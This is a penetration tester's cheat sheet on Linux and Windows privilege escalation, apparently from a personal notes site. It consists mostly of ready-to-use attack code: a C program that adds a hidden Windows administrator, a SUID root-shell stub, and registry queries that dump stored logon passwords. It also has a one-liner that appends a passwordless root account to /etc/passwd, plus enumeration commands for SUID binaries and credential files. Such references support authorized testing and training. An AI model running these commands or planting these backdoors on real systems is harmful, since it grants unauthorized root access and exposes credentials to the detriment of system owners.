Priv Escalation

Search…
Priv Escalation
Privilege Escalation
GTFOBins
Linux elevation of privileges
Windows elevation of privileges
FuzzySecurity | Windows Privilege Escalation Fundamentals
​https://payatu.com/guide-linux-privilege-escalation​
Linux Privilege Escalation
sudo -l
Kernel Exploits
OS Exploits
Password reuse (mysql, .bash_history, 000-default.conf...)
Known binaries with suid flag and interactive (nmap)
Custom binaries with suid flag either using other binaries or with command execution
Writable files owned by root that get executed (cronjobs)
MySQL as root
Vulnerable services (chkrootkit, logrotate)
Writable /etc/passwd
Readable .bash_history
SSH private key
Listening ports on localhost
/etc/fstab
/etc/exports
/var/mail
Process as other user (root) executing something you have permissions to modify
SSH public key + Predictable PRNG
apt update hooking (Pre-Invoke)
Capabilities
Windows Privilege Escalation
Kernel Exploits
OS Exploits
Pass The Hash
Password reuse
DLL hijacking (Path)
Vulnerable services
Writable services binaries path
Unquoted services
Listening ports on localhost
Registry keys
Kernel Exploits
Linux: https://github.com/lucyoa/kernel-exploits​
Windows: https://github.com/abatchy17/WindowsExploits​
1
https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/
2
https://pentest.blog/windows-privilege-escalation-methods-for-pentesters/
3
http://www.fuzzysecurity.com/tutorials/16.html
Copied!
​
Windows Add User
1
#include <stdlib.h> /* system, NULL, EXIT_FAILURE */
2
​
3
int main ()
4
{
5
  int i;
6
  i=system ("net user <username> <password> /add && net localgroup administrators <username> /add");
7
  return 0;
8
}
Copied!
​
SUID Change
1
SUID
2
​
3
Set owner user ID.
4
​
5
int main(void){
6
  setresuid(0, 0, 0);
7
  system("/bin/bash");
8
}
9
​
Copied!
1
Privilege Escalation:
2
#Find Binaries that will execute as the owner
3
find / -perm -u=s -type f 2>/dev/null
4
​
5
#Find binaries that will execute as the group
6
find / -perm -g=s -type f 2>/dev/null
7
​
8
#Find sticky-bit binaries
9
find / -perm -1000 -type d 2>/dev/null
10
​
11
find / -perm -4000 2>/dev/null
12
​
13
writable by everyone
14
find / -writable -type f 2>/dev/null
15
​
16
World writeable directories
17
find / \( -wholename '/home/homedir*' -prune \) -o \( -type d -perm -0002 \) -exec ls -ld '{}' ';' 2>/dev/null | grep -v root
18
​
19
World writeable files
20
find / \( -wholename '/home/homedir/*' -prune -o -wholename '/proc/*' -prune \) -o \( -type f -perm -0002 \) -exec ls -l '{}' ';' 2>/dev/null
21
​
22
Writeable config files
23
find /etc/ -writable -type f 2>/dev/null
24
​
25
find / -user root -perm -4000 -exec ls -ld {} \; 2> /dev/null
26
​
Copied!
Window Exploit Suggester
1
python2 windows-exploit-suggester.py --database 2017-10-10-mssb.xls --systeminfo ../systeminfo.txt --quiet
2
python windows-exploit-suggester.py –systeminfo systeminfo.txt –database 2018-11-25-mssb.xls
Copied!
Windows Priv Escalation
1
AlwaysInstallElevated
2
Check if the following registry settings are set to "1"
3
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
4
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
5
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" 2>nul | findstr "DefaultUserName DefaultDomainName DefaultPassword"
6
​
Copied!
​
Basic Linux Enumeration
1
Distribution type & kernel version
2
cat /etc/*release*
3
uname -a
4
rpm -q kernel
5
dmesg | grep -i linux
6
​
7
Default writeable directory / folder
8
/tmp
9
/dev/shm
10
​
11
Search for passwords
12
Search for password within config.php
13
grep -R 'password' config.php
14
​
15
Find possible other writeable directory / folder
16
find / -type d \( -perm -g+w -or -perm -o+w \) -exec ls -adl {} \;
17
​
18
Service(s) running as root user
19
ps aux | grep root
20
ps -ef | grep root
21
​
22
Installed applications
23
ls -lah /usr/bin/
24
ls -lah /sbin/
25
dpkg -l
26
rpm -qa
27
ls -lah /var/cache/apt/archivesO
28
ls -lah /var/cache/yum/
29
​
30
Scheduled jobs
31
crontab -l
32
ls -la /etc/cron*
33
ls -lah /var/spool/cron
34
ls -la /etc/ | grep cron
35
cat /etc/crontab
36
cat /etc/anacrontab
37
​
38
Find pattern in file:
39
grep -rnw '/etc/passwd' -e 'root'
40
​
41
Sticky bit, SGID, SUID, GUID
42
Sticky bit
43
find / -perm -1000 -type d 2>/dev/null
44
​
45
SGID (chmod 2000)
46
find / -perm -g=s -type f 2>/dev/null
47
​
48
SUID (chmod 4000)
49
find / -perm -u=s -type f 2>/dev/null
50
find /* -user root -perm -4000 -print 2>/dev/null
51
​
52
SUID or GUID
53
find / -perm -g=s -o -perm -u=s -type f 2>/dev/null
54
​
55
Add user to /etc/passwd and root group
56
echo hodor::0:0:root:/root:/bin/bash >> /etc/passwd
57
​
Copied!
​
Transfer files on linux
Linux Priv Escalation
Last modified 1yr ago
Copy link